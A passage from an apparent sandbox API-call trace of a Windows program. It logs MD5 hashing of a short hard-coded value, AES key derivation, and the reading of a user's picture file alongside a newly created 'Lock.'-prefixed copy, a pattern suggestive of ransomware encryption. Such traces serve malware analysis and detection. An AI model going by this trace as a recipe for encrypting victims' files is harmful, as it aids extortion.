lpMsg=0x8ceef8) returned 0 [0210.592] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.593] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.593] CryptCreateHash (in: hProv=0xa7c088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.594] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.594] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.594] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71c18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.594] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.594] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.594] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.595] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.595] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab1a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.595] CryptDeriveKey (in: hProv=0xa7c088, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.595] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.595] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.595] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.595] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.596] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.596] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0210.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.596] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/ktNHTaW.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ktnhtaw.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.597] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.597] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73f98 [0210.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.599] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f98 | out: hHeap=0x2af0000) returned 1 [0210.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.ktNHTaW.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.ktnhtaw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0210.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0210.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50eb020 [0210.605] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.605] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0210.608] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x8cc1, lpOverlapped=0x0) returned 1 [0210.608] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, 